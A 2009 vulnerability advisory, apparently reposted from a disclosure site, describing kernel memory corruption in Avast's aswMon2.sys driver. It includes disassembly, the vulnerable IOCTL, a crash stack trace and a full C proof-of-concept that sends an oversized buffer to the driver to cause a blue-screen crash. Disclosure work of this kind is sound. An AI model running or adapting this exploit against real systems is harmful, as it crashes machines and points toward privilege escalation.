Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22509
HistorySep 23, 2009 - 12:00 a.m.

Avast aswMon2.sys kernel memory corruption and Local Privilege Escalation.

2009-09-2300:00:00
vulners.com
15

Source:
https://www.evilfingers.com/advisory/Advisory/Avast_aswMon2.sys_kernel_memory_corruption_and_Local_Privilege_Escalation.php

-----------[Avast aswMon2.sys kernel memory corruption and Local Privilege Escalation]--------->

Author: Giuseppe 'Evilcry' Bonfa'
E-Mail: evilcry {AT} GMAIL {DOT} COM<br>
Website: http://evilcry.netsons.org<br>
http://evilcodecave.blogspot.com<br>
http://evilcodecave.wordpress.com<br>
http://evilfingers.com<br>

Disclosure Timeline
Discover Date: Sep 13, 2009 PoC Code: Sep 13, 2009<br>
Vendor Notify: Sep 15,2009 Vendor Reply: Sep 15, 2009<br><br>

After various mails about publishing date
ignored, here the Public Disclosure.

±-------------------------------------------------------------------------+
Product: Avast antivirus 4.8.1351.0 (other versions could be affected)
Affected Component: aswMon2.sys 4.8.1351.0
Category: Local Denial of Service due to kernel memory corruption (BSOD)
(untested) Local Privilege Escalation

±--------------------------------------------------------------------------+

--------------------------[Details]--------------->

Avast's aswMon2.sys Driver does not sanitize user supplied input IOCTL) and this lead to a kernel memory corruption that
propagates
on the system with a BSOD and potential risk of Privilege Escalation.<br><br>

00010F70 cmp [ebp+arg_C], 288h ;InBuff Len no other checks performed<br>
00010F77 jnz loc_111AC<br>
00010F7D mov esi, [ebp+SourceString]<br>
00010F80 cmp [esi], ebx<br>
00010F82 mov [ebp+arg_C], ebx<br><br>

Affected IOCTL is B2C80018<br><br>

UNEXPECTED_KERNEL_MODE_TRAP_M (1000007f)<br><br>

Transfer Type: METHOD_BUFFERED<br><br>

STACK_TEXT:<br><br>

WARNING: Stack unwind information not available. Following frames may be wrong.<br>
f76f3234 8053d251 f76f3250 00000000 f76f32a4 nt+0x600fa<br>
f76f32a4 8052c712 badb0d00 20a0a0a1 f76f5658 nt+0x66251<br>
f76f3328 8052c793 41414141 00000000 f76f377c nt+0x55712<br>
f76f33a4 804fc700 f76f377c f76f3478 05050505 nt+0x55793<br><br>
.
f76f56d8 f7756a04 badb0d00 8055b256 00000000 nt+0x66251<br>
f76f576c 41414141 41414141 41414141 41414141 aswMon2+0xa04<br>
f76f5770 41414141 41414141 41414141 41414141 0x41414141<br>
f76f5774 41414141 41414141 41414141 41414141 0x41414141<br>
f76f5778 41414141 41414141 41414141 41414141 0x41414141<br>
f76f577c 41414141 41414141 41414141 41414141 0x41414141<br>
f76f5780 41414141 41414141 41414141 41414141 0x41414141<br>
.<br><br>

±--------------------------------------------------------------------------+

/ * Avast 4.8.1351.0 antivirus aswMon2.sys Kernel Memory Corruption<br>
*<br>

  • Author: Giuseppe 'Evilcry' Bonfa'<br>
  • E-Mail: evilcry AT gmail DOT com<br>
  • Website: http://evilcry.netsons.org<br>
  •      http://evilcodecave.blogspot.com &lt;br&gt;
    
  •      http://evilfingers.com&lt;br&gt;
    

*<br>

  • Vendor: Notified<br>
    *<br>
  • No L.P.E. for kiddies<br>
  • /<br><br>

#define WIN32_LEAN_AND_MEAN<br>
#include < windows.h><br>
#include < stdio.h><br><br>

BOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice) //taken from esagelab<br>
{<br>
WCHAR DeviceName[MAX_PATH];<br>
HANDLE hDevice;<br>

    if &#40;&#40;GetVersion&#40;&#41; &amp; 0xFF&#41; &gt;= 5&#41; &lt;br&gt;
    {&lt;br&gt;
            wcscpy&#40;DeviceName, L&quot;&#92;&#92;&#92;&#92;.&#92;&#92;Global&#92;&#92;&quot;&#41;;&lt;br&gt;
    } &lt;br&gt;
    else &lt;br&gt;
    {&lt;br&gt;
            wcscpy&#40;DeviceName, L&quot;&#92;&#92;&#92;&#92;.&#92;&#92;&quot;&#41;;&lt;br&gt;
    }&lt;br&gt;&lt;br&gt;

    wcscat&#40;DeviceName, DriverName&#41;;&lt;br&gt;

    printf&#40;&quot;Opening.. &#37;S&#92;n&quot;, DeviceName&#41;;&lt;br&gt;

    hDevice = CreateFileW&#40;DeviceName, GENERIC_READ | &lt;br&gt;
    GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 
            FILE_ATTRIBUTE_NORMAL, NULL&#41;;&lt;br&gt;&lt;br&gt;

    if &#40;hDevice == INVALID_HANDLE_VALUE&#41;&lt;br&gt;
    {&lt;br&gt;
            printf&#40;&quot;CreateFile&#40;&#41; ERROR &#37;d&#92;n&quot;, GetLastError&#40;&#41;&#41;;&lt;br&gt;
            return FALSE;&lt;br&gt;
    }&lt;br&gt;&lt;br&gt;

    *lphDevice = hDevice;&lt;br&gt;

    return TRUE;&lt;br&gt;

}<br><br>

int main()<br>
{<br>
HANDLE hDev = NULL;<br>
DWORD Junk;<br>

    if&#40;!OpenDevice&#40;L&quot;aswMon&quot;,&amp;hDev&#41;&#41;&lt;br&gt;
    {&lt;br&gt;
            printf&#40;&quot;Unable to access aswMon&quot;&#41;;&lt;br&gt;
            return&#40;0&#41;;&lt;br&gt;
    }&lt;br&gt;&lt;br&gt;

    char *Buff = &#40;char *&#41;VirtualAlloc&#40;NULL, 0x288, MEM_RESERVE | &lt;br&gt;
    MEM_COMMIT, PAGE_EXECUTE_READWRITE&#41;;&lt;br&gt;&lt;br&gt;

    if &#40;Buff&#41;&lt;br&gt;
    {&lt;br&gt;
            memset&#40;Buff, &#39;A&#39;, 0x288&#41;;&lt;br&gt;
            DeviceIoControl&#40;hDev,0xB2C80018,Buff,
            0x288,Buff,0x288,&amp;Junk,&#40;LPOVERLAPPED&#41;NULL&#41;;&lt;br&gt;
            printf&#40;&quot;DeviceIoControl Executed..&#92;n&quot;&#41;; &lt;br&gt;    
    }    &lt;br&gt;
    else&lt;br&gt;
    {&lt;br&gt;
            printf&#40;&quot;VirtualAlloc&#40;&#41; ERROR &#37;d&#92;n&quot;, GetLastError&#40;&#41;&#41;;&lt;br&gt;
    }&lt;br&gt;


    return&#40;0&#41;;&lt;br&gt;

}<br><br>

±--------------------------------------------------------------------------+

Regards,
Giuseppe 'Evilcry' Bonfa'